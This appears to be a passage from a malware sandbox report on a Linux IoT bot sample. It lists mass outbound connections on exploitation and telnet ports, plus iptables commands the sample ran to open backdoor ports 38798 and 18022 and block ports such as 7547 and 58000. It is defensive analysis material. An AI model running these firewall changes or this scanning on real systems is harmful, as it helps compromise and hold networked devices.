Source: global traffic TCP traffic: 65.184.246.105 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 60.167.18.127 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 84.40.97.17 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 173.7.142.106 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 180.73.169.36 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 166.58.177.197 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 94.169.172.220 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 128.62.193.183 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 136.5.82.110 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 99.47.34.28 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 128.69.73.19 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 196.101.144.179 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 146.168.208.157 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 78.91.242.78 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 186.198.44.96 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 214.196.245.191 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.244.105.198 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 142.162.240.88 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 44.163.103.21 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 163.192.137.169 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.1.97.153 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 200.172.177.133 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 34.9.142.75 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 193.29.122.130 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 31.157.161.123 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 165.11.161.224 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 78.74.223.1 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 193.94.174.79 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 217.103.71.102 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 204.185.64.60 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 141.248.130.228 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 80.211.20.126 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 7.108.184.228 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 140.6.78.199 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 6.94.160.221 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 14.81.232.70 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 55.177.210.173 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 8.169.91.139 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 52.224.63.176 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 135.53.39.119 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 144.89.67.225 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 140.40.46.56 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 29.145.147.14 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 143.27.173.36 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 173.147.84.217 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 129.86.130.59 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 22.102.33.44 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 184.185.74.165 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 164.69.135.124 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.254.218.74 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 130.11.96.200 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 55.81.150.224 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 2.25.210.178 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 35.248.184.105 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 73.31.128.199 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 110.196.111.163 ports 2,5,6,8,9,52869
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4635) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4668) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4671) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4707) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4733) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4754) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4776) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4811) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4814) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4823) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4846) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4894) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4920) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4944) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4948) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4957) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4980) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5024) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5032) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5053) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5080) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5107) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5135) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5149) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5172) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5186) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5227) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5249) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5252) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 34784 -> 7574
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.20:41356 -> 2.25.210.178:37215
Source: global traffic TCP traffic: 192.168.2.20:34848 -> 184.164.122.183:5555
Source: global traffic TCP traffic: 192.168.2.20:33446 -> 83.138.58.60:8080
Source: global traffic TCP traffic: 192.168.2.20:44088 -> 77.89.211.235:7574
Source: global traffic TCP traffic: 192.168.2.20:39094 -> 110.196.111.163:52869
Source: global traffic TCP traffic: 192.168.2.20:46462 -> 188.39.11.49:8080
Source: global traffic TCP traffic: 192.168.2.20:35438 -> 21.167.23.229:8443
Source: global traffic TCP traffic: 192.168.2.20:38082 -> 154.228.225.43:7574
Source: global traffic TCP traffic: 192.168.2.20:44312 -> 142.185.51.138:52869
Source: global traffic TCP traffic: 192.168.2.20:57324 -> 121.235.253.2:49152
Source: global traffic TCP traffic: 192.168.2.20:49620 -> 29.145.147.14:37215
Source: global traffic TCP traffic: 192.168.2.20:39532 -> 103.85.31.98:5555
Source: global traffic TCP traffic: 192.168.2.20:48026 -> 158.169.216.109:81
Source: global traffic TCP traffic: 192.168.2.20:33318 -> 133.43.111.70:81
Source: global traffic TCP traffic: 192.168.2.20:45632 -> 129.12.160.142:5555
Source: global traffic TCP traffic: 192.168.2.20:39952 -> 94.167.107.6:8443
Source: global traffic TCP traffic: 192.168.2.20:36110 -> 87.70.234.237:5555
Source: global traffic TCP traffic: 192.168.2.20:57140 -> 37.146.10.10:5555
Source: global traffic TCP traffic: 192.168.2.20:33132 -> 12.106.20.19:7574
Source: global traffic TCP traffic: 192.168.2.20:54950 -> 94.169.172.220:49152
Source: global traffic TCP traffic: 192.168.2.20:56078 -> 110.102.65.9:8080
Source: global traffic TCP traffic: 192.168.2.20:50314 -> 41.177.29.19:8443
Source: global traffic TCP traffic: 192.168.2.20:49832 -> 120.206.173.159:8443
Source: global traffic TCP traffic: 192.168.2.20:52776 -> 147.73.77.123:5555
Source: global traffic TCP traffic: 192.168.2.20:57042 -> 106.249.234.237:8080
Source: global traffic TCP traffic: 192.168.2.20:53376 -> 23.216.220.40:8443
Source: global traffic TCP traffic: 192.168.2.20:47808 -> 7.108.184.228:49152
Source: global traffic TCP traffic: 192.168.2.20:35406 -> 34.9.142.75:49152
Source: global traffic TCP traffic: 192.168.2.20:51474 -> 117.254.218.74:49152
Source: global traffic TCP traffic: 192.168.2.20:35366 -> 199.53.125.193:7574
Source: global traffic TCP traffic: 192.168.2.20:46094 -> 105.32.8.235:8080
Source: global traffic TCP traffic: 192.168.2.20:55200 -> 149.10.244.182:7574
Source: global traffic TCP traffic: 192.168.2.20:48964 -> 34.106.39.153:8080
Source: global traffic TCP traffic: 192.168.2.20:49094 -> 80.230.157.194:8443
Source: global traffic TCP traffic: 192.168.2.20:57356 -> 119.52.222.172:8080
Source: global traffic TCP traffic: 192.168.2.20:57526 -> 76.0.10.171:8080
Source: global traffic TCP traffic: 192.168.2.20:57584 -> 193.81.154.165:7574
Source: global traffic TCP traffic: 192.168.2.20:52596 -> 215.1.190.118:8080
Source: global traffic TCP traffic: 192.168.2.20:41596 -> 16.179.214.74:8080
Source: global traffic TCP traffic: 192.168.2.20:55882 -> 90.153.163.206:5555
Source: global traffic TCP traffic: 192.168.2.20:46048 -> 102.112.99.110:8080
Source: global traffic TCP traffic: 192.168.2.20:46072 -> 52.224.63.176:52869
Source: global traffic TCP traffic: 192.168.2.20:37640 -> 179.5.44.160:8443
Source: global traffic TCP traffic: 192.168.2.20:33648 -> 147.209.183.102:8080
Source: global traffic TCP traffic: 192.168.2.20:51958 -> 47.208.112.60:8080
Source: global traffic TCP traffic: 192.168.2.20:57910 -> 13.198.237.32:81
Source: global traffic TCP traffic: 192.168.2.20:59648 -> 191.159.187.60:5555
Source: global traffic TCP traffic: 192.168.2.20:48938 -> 207.188.217.55:8443
Source: global traffic TCP traffic: 192.168.2.20:37396 -> 138.184.234.192:7574
Source: global traffic TCP traffic: 192.168.2.20:41582 -> 2.252.1.26:8080
Source: global traffic TCP traffic: 192.168.2.20:38130 -> 186.198.44.96:52869
Source: global traffic TCP traffic: 192.168.2.20:57636 -> 110.127.34.195:7574
Source: global traffic TCP traffic: 192.168.2.20:37792 -> 130.11.96.200:37215
Source: global traffic TCP traffic: 192.168.2.20:49410 -> 142.162.240.88:37215
Source: global traffic TCP traffic: 192.168.2.20:46788 -> 194.66.198.59:8080
Source: global traffic TCP traffic: 192.168.2.20:37572 -> 59.87.199.121:5555
Source: global traffic TCP traffic: 192.168.2.20:37146 -> 31.33.198.128:8080
Source: global traffic TCP traffic: 192.168.2.20:37388 -> 41.67.135.38:8080
Source: global traffic TCP traffic: 192.168.2.20:46758 -> 9.120.123.80:5555
Source: global traffic TCP traffic: 192.168.2.20:42400 -> 165.11.161.224:52869
Source: global traffic TCP traffic: 192.168.2.20:33604 -> 75.20.211.169:7574
Source: global traffic TCP traffic: 192.168.2.20:39084 -> 108.108.45.183:8443
Source: global traffic TCP traffic: 192.168.2.20:56146 -> 186.179.212.59:37215
Source: global traffic TCP traffic: 192.168.2.20:36096 -> 84.56.89.143:8080
Source: global traffic TCP traffic: 192.168.2.20:49716 -> 11.34.180.15:8080
Source: global traffic TCP traffic: 192.168.2.20:54490 -> 171.106.42.2:8080
Source: global traffic TCP traffic: 192.168.2.20:60286 -> 120.58.188.59:8080
Source: global traffic TCP traffic: 192.168.2.20:53470 -> 152.55.230.154:8080
Source: global traffic TCP traffic: 192.168.2.20:36520 -> 138.77.221.45:81
Source: global traffic TCP traffic: 192.168.2.20:53866 -> 48.158.121.17:8080
Source: global traffic TCP traffic: 192.168.2.20:37498 -> 25.239.173.92:8080
Source: global traffic TCP traffic: 192.168.2.20:48316 -> 98.15.164.97:8443
Source: global traffic TCP traffic: 192.168.2.20:51442 -> 60.167.18.127:49152
Source: global traffic TCP traffic: 192.168.2.20:59930 -> 149.79.115.130:7574
Source: global traffic TCP traffic: 192.168.2.20:56084 -> 84.40.97.17:37215
Source: global traffic TCP traffic: 192.168.2.20:59828 -> 173.7.142.106:49152
Source: global traffic TCP traffic: 192.168.2.20:49642 -> 82.239.159.226:81
Source: global traffic TCP traffic: 192.168.2.20:51430 -> 105.32.129.130:8443
Source: global traffic TCP traffic: 192.168.2.20:40780 -> 96.172.67.87:8080
Source: global traffic TCP traffic: 192.168.2.20:33320 -> 91.18.148.170:8080
Source: global traffic TCP traffic: 192.168.2.20:58354 -> 97.233.31.184:8080
Source: global traffic TCP traffic: 192.168.2.20:38556 -> 18.236.119.78:7574
Source: global traffic TCP traffic: 192.168.2.20:44540 -> 163.192.137.169:37215
Source: global traffic TCP traffic: 192.168.2.20:43944 -> 140.6.78.199:49152
Source: global traffic TCP traffic: 192.168.2.20:47648 -> 88.121.162.132:7574
Source: global traffic TCP traffic: 192.168.2.20:42346 -> 86.54.3.250:5555
Source: global traffic TCP traffic: 192.168.2.20:53840 -> 139.58.181.193:8080
Source: global traffic TCP traffic: 192.168.2.20:57356 -> 43.224.146.113:8080
Source: global traffic TCP traffic: 192.168.2.20:45520 -> 124.156.101.207:5555
Source: global traffic TCP traffic: 192.168.2.20:35854 -> 213.15.5.141:49152
Source: global traffic TCP traffic: 192.168.2.20:51448 -> 22.102.33.44:37215
Source: global traffic TCP traffic: 192.168.2.20:44808 -> 136.5.82.110:49152
Source: global traffic TCP traffic: 192.168.2.20:44976 -> 106.234.149.13:8080
Source: global traffic TCP traffic: 192.168.2.20:45254 -> 45.175.218.157:49152
Source: global traffic TCP traffic: 192.168.2.20:43748 -> 73.234.35.172:81
Source: global traffic TCP traffic: 192.168.2.20:57144 -> 39.160.28.57:8080
Source: global traffic TCP traffic: 192.168.2.20:59196 -> 109.132.130.36:8080
Source: global traffic TCP traffic: 192.168.2.20:35172 -> 40.109.52.109:7574
Source: global traffic TCP traffic: 192.168.2.20:48020 -> 144.177.63.135:81
Source: global traffic TCP traffic: 192.168.2.20:34228 -> 198.246.42.190:7574
Source: global traffic TCP traffic: 192.168.2.20:47856 -> 204.71.20.18:8080
Source: global traffic TCP traffic: 192.168.2.20:55410 -> 6.94.160.221:37215
Source: global traffic TCP traffic: 192.168.2.20:35130 -> 105.55.198.173:81
Source: global traffic TCP traffic: 192.168.2.20:46870 -> 134.216.132.209:8080
Source: global traffic TCP traffic: 192.168.2.20:52962 -> 197.197.179.204:7574
Source: global traffic TCP traffic: 192.168.2.20:38224 -> 114.115.195.219:5555
Source: global traffic TCP traffic: 192.168.2.20:39628 -> 31.112.44.50:5555
Source: global traffic TCP traffic: 192.168.2.20:58720 -> 65.184.246.105:52869
Source: global traffic TCP traffic: 192.168.2.20:45640 -> 116.193.191.147:5555
Source: global traffic TCP traffic: 192.168.2.20:42190 -> 88.153.187.49:8443
Source: global traffic TCP traffic: 192.168.2.20:46074 -> 173.147.84.217:52869
Source: global traffic TCP traffic: 192.168.2.20:55164 -> 5.76.27.230:7574
Source: global traffic TCP traffic: 192.168.2.20:44464 -> 31.157.161.123:37215
Source: global traffic TCP traffic: 192.168.2.20:48894 -> 165.222.20.146:8080
Source: global traffic TCP traffic: 192.168.2.20:38654 -> 164.69.135.124:37215
Source: global traffic TCP traffic: 192.168.2.20:39828 -> 163.216.121.236:8080
Source: global traffic TCP traffic: 192.168.2.20:44614 -> 144.89.67.225:37215
Source: global traffic TCP traffic: 192.168.2.20:34464 -> 204.185.64.60:37215
Source: global traffic TCP traffic: 192.168.2.20:48126 -> 55.81.150.224:37215
Source: global traffic TCP traffic: 192.168.2.20:50982 -> 52.0.157.125:52869
Source: global traffic TCP traffic: 192.168.2.20:48330 -> 211.36.253.8:8080
Source: global traffic TCP traffic: 192.168.2.20:50230 -> 178.220.64.117:8080
Source: global traffic TCP traffic: 192.168.2.20:53526 -> 135.53.39.119:49152
Source: global traffic TCP traffic: 192.168.2.20:57654 -> 113.120.152.5:8080
Source: global traffic TCP traffic: 192.168.2.20:52062 -> 27.208.150.177:8443
Source: global traffic TCP traffic: 192.168.2.20:59332 -> 185.245.247.220:7574
Source: global traffic TCP traffic: 192.168.2.20:55230 -> 74.79.90.89:8080
Source: global traffic TCP traffic: 192.168.2.20:33548 -> 194.159.135.166:8080
Source: global traffic TCP traffic: 192.168.2.20:45030 -> 186.96.51.35:8080
Source: global traffic TCP traffic: 192.168.2.20:54464 -> 44.163.103.21:37215
Source: global traffic TCP traffic: 192.168.2.20:47064 -> 119.178.225.96:81
Source: global traffic TCP traffic: 192.168.2.20:53248 -> 140.40.46.56:52869
Source: global traffic TCP traffic: 192.168.2.20:41556 -> 47.128.19.145:81
Source: global traffic TCP traffic: 192.168.2.20:58864 -> 60.50.138.0:8080
Source: global traffic TCP traffic: 192.168.2.20:54388 -> 80.211.20.126:49152
Source: global traffic TCP traffic: 192.168.2.20:55010 -> 160.208.85.97:8080
Source: global traffic TCP traffic: 192.168.2.20:46172 -> 13.71.215.27:8080
Source: global traffic TCP traffic: 192.168.2.20:44906 -> 52.176.144.32:8080
Source: global traffic TCP traffic: 192.168.2.20:54134 -> 146.168.208.157:37215
Source: global traffic TCP traffic: 192.168.2.20:52222 -> 14.81.232.70:49152
Source: global traffic TCP traffic: 192.168.2.20:50070 -> 148.189.123.241:8080
Source: global traffic TCP traffic: 192.168.2.20:35258 -> 78.91.242.78:37215
Source: global traffic TCP traffic: 192.168.2.20:33720 -> 153.123.234.159:8443
Source: global traffic TCP traffic: 192.168.2.20:51852 -> 196.101.144.179:37215
Source: global traffic TCP traffic: 192.168.2.20:40784 -> 162.254.84.124:7574
Source: global traffic TCP traffic: 192.168.2.20:44836 -> 214.196.245.191:37215
Source: global traffic TCP traffic: 192.168.2.20:45086 -> 99.70.118.57:8080
Source: global traffic TCP traffic: 192.168.2.20:54474 -> 221.69.238.49:8080
Source: global traffic TCP traffic: 192.168.2.20:35514 -> 73.31.128.199:37215
Source: global traffic TCP traffic: 192.168.2.20:38780 -> 120.17.249.56:5555
Source: global traffic TCP traffic: 192.168.2.20:49418 -> 221.254.99.41:5555
Source: global traffic TCP traffic: 192.168.2.20:33682 -> 202.247.214.124:5555
Source: global traffic TCP traffic: 192.168.2.20:50462 -> 194.215.108.22:8080
Source: global traffic TCP traffic: 192.168.2.20:46150 -> 221.98.57.70:8080
Source: global traffic TCP traffic: 192.168.2.20:48076 -> 9.100.3.73:8080
Source: global traffic TCP traffic: 192.168.2.20:48646 -> 55.94.52.202:7574
Source: global traffic TCP traffic: 192.168.2.20:43004 -> 220.108.199.55:8080
Source: global traffic TCP traffic: 192.168.2.20:43390 -> 134.78.201.24:5555
Source: global traffic TCP traffic: 192.168.2.20:34046 -> 184.185.74.165:49152
Source: global traffic TCP traffic: 192.168.2.20:43276 -> 205.107.77.143:8080
Source: global traffic TCP traffic: 192.168.2.20:43650 -> 193.94.174.79:37215
Source: global traffic TCP traffic: 192.168.2.20:37710 -> 59.39.113.134:8080
Source: global traffic TCP traffic: 192.168.2.20:33160 -> 128.62.193.183:49152
Source: global traffic TCP traffic: 192.168.2.20:51754 -> 85.247.17.231:8080
Source: global traffic TCP traffic: 192.168.2.20:35656 -> 126.249.0.35:5555
Source: global traffic TCP traffic: 192.168.2.20:57060 -> 103.125.148.38:8080
Source: global traffic TCP traffic: 192.168.2.20:50944 -> 22.13.23.29:8080
Source: global traffic TCP traffic: 192.168.2.20:56504 -> 129.86.130.59:52869
Source: global traffic TCP traffic: 192.168.2.20:59416 -> 99.47.34.28:49152
Source: global traffic TCP traffic: 192.168.2.20:43546 -> 212.130.124.164:8080
Source: global traffic TCP traffic: 192.168.2.20:55830 -> 212.49.144.78:8080
Source: global traffic TCP traffic: 192.168.2.20:38598 -> 54.185.114.20:8080
Source: global traffic TCP traffic: 192.168.2.20:51730 -> 32.18.89.90:8443
Source: global traffic TCP traffic: 192.168.2.20:33064 -> 166.58.177.197:37215
Source: global traffic TCP traffic: 192.168.2.20:47416 -> 141.248.130.228:49152
Source: global traffic TCP traffic: 192.168.2.20:32792 -> 179.158.180.205:8080
Source: global traffic TCP traffic: 192.168.2.20:52230 -> 102.190.117.35:81
Source: global traffic TCP traffic: 192.168.2.20:34702 -> 67.98.221.132:8080
Source: global traffic TCP traffic: 192.168.2.20:46840 -> 57.124.181.88:81
Source: global traffic TCP traffic: 192.168.2.20:39668 -> 132.16.154.147:8080
Source: global traffic TCP traffic: 192.168.2.20:50786 -> 88.113.75.229:81
Source: global traffic TCP traffic: 192.168.2.20:48264 -> 217.103.71.102:49152
Source: global traffic TCP traffic: 192.168.2.20:39872 -> 64.193.108.89:7574
Source: global traffic TCP traffic: 192.168.2.20:51680 -> 93.120.221.240:8080
Source: global traffic TCP traffic: 192.168.2.20:49098 -> 162.190.197.9:8443
Source: global traffic TCP traffic: 192.168.2.20:49002 -> 160.187.96.95:5555
Source: global traffic TCP traffic: 192.168.2.20:32804 -> 8.169.91.139:52869
Source: global traffic TCP traffic: 192.168.2.20:51912 -> 140.179.8.230:81
Source: global traffic TCP traffic: 192.168.2.20:33742 -> 214.213.101.21:5555
Source: global traffic TCP traffic: 192.168.2.20:55182 -> 203.23.182.178:5555
Source: global traffic TCP traffic: 192.168.2.20:57070 -> 193.29.122.130:37215
Source: global traffic TCP traffic: 192.168.2.20:35690 -> 197.18.203.47:8080
Source: global traffic TCP traffic: 192.168.2.20:40750 -> 61.227.232.149:8080
Source: global traffic TCP traffic: 192.168.2.20:34032 -> 128.78.172.160:8443
Source: global traffic TCP traffic: 192.168.2.20:34916 -> 78.74.223.1:37215
Source: global traffic TCP traffic: 192.168.2.20:51370 -> 182.48.45.177:5555
Source: global traffic TCP traffic: 192.168.2.20:49740 -> 165.150.135.185:81
Source: global traffic TCP traffic: 192.168.2.20:45682 -> 17.48.96.114:7574
Source: global traffic TCP traffic: 192.168.2.20:54440 -> 16.118.154.91:8080
Source: global traffic TCP traffic: 192.168.2.20:53506 -> 199.153.89.155:7574
Source: global traffic TCP traffic: 192.168.2.20:59578 -> 117.1.97.153:37215
Source: global traffic TCP traffic: 192.168.2.20:35902 -> 150.49.127.144:8080
Source: global traffic TCP traffic: 192.168.2.20:48474 -> 152.199.134.80:8080
Source: global traffic TCP traffic: 192.168.2.20:33494 -> 22.55.173.236:8080
Source: global traffic TCP traffic: 192.168.2.20:43956 -> 116.103.130.222:5555
Source: global traffic TCP traffic: 192.168.2.20:55328 -> 55.177.210.173:52869
Source: global traffic TCP traffic: 192.168.2.20:48226 -> 180.73.169.36:37215
Source: global traffic TCP traffic: 192.168.2.20:54022 -> 80.173.222.186:5555
Source: global traffic TCP traffic: 192.168.2.20:33238 -> 83.145.58.251:8080
Source: global traffic TCP traffic: 192.168.2.20:54474 -> 154.123.116.128:81
Source: global traffic TCP traffic: 192.168.2.20:58546 -> 95.244.105.198:52869
Source: global traffic TCP traffic: 192.168.2.20:48380 -> 73.110.226.72:81
Source: global traffic TCP traffic: 192.168.2.20:51856 -> 7.143.196.100:7574
Source: global traffic TCP traffic: 192.168.2.20:60952 -> 200.172.177.133:49152
Source: global traffic TCP traffic: 192.168.2.20:52122 -> 220.195.77.197:8080
Source: global traffic TCP traffic: 192.168.2.20:38930 -> 37.94.172.144:8080
Source: global traffic TCP traffic: 192.168.2.20:33300 -> 113.151.155.155:7574
Source: global traffic TCP traffic: 192.168.2.20:38872 -> 128.69.73.19:49152
Source: global traffic TCP traffic: 192.168.2.20:38158 -> 143.27.173.36:37215
Source: global traffic TCP traffic: 192.168.2.20:60954 -> 35.248.184.105:37215
Source: global traffic TCP traffic: 192.168.2.20:57952 -> 79.20.246.25:81
Source: global traffic TCP traffic: 192.168.2.20:47112 -> 63.32.104.39:7574
Source: global traffic TCP traffic: 192.168.2.20:45204 -> 4.107.52.169:8443
Source: global traffic TCP traffic: 192.168.2.20:50824 -> 158.166.109.92:8443
Source: global traffic TCP traffic: 192.168.2.20:60710 -> 124.173.58.110:8080
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 150.251.37.244:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 90.174.187.153:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 31.89.219.2:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 102.100.217.96:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 18.105.207.147:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 190.157.11.194:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 43.53.171.173:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 86.99.210.57:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 112.58.7.129:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 58.162.55.56:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 88.78.65.223:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 220.238.66.39:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 209.147.41.3:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 123.27.145.228:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 62.237.192.89:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 99.222.227.88:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 141.106.171.91:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 154.35.38.40:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 38.41.215.21:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 164.145.194.191:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 167.162.64.76:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 141.1.164.22:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 104.65.164.249:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 31.203.218.231:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 208.24.53.147:2323
